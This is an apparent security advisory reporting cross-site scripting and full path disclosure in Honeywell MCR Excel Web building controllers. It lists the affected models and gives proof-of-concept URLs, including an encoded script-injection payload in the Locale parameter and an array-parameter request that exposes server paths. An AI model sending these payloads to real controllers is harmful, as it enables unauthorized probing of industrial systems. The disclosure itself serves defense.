Honeywell MCR Web Controller Cross Site Scripting / Path Disclosure

2019.11.12
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Honeywell MCR Web Controller # Full Path Disclosure & Cross Site Scripting # Vendor Homepage: https://www.honeywell.com # WebVersion: XL1000C50 EXCEL WEB 52 I/O, XL1000C500 EXCEL WEB 300 I/O, XL1000C100 EXCEL WEB 104 I/O, XL1000C1000 EXCEL WEB 600 I/O, XL1000C50U EXCEL WEB 52 I/O UUKL, XL1000C500U EXCEL WEB 300 I/O UUKL, XL1000C100U EXCEL WEB 104 I/O UUKL, XL1000C1000U EXCEL WEB 600 I/O UUKL. # Tested on: EXCEL WEB - AIT AG XL1000C1000U 600 I/O UUKL - 05.03.2008 # Date: Nov 09, 2019 # Informer: Pablo Rebolini - <rebolini.pablo[x]gmail.com> # Full Path Disclosure http://<excel-web.host>/standard/login/help.php http://<excel-web.host>/standard/login/help.php?Locale=1033&ID[]=0 # Cross Site Scripting http:// <excel-web.host>/standard/default.php?Locale=%22%3C/script%3E%3Ch1%3EXSS%3C/%22


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top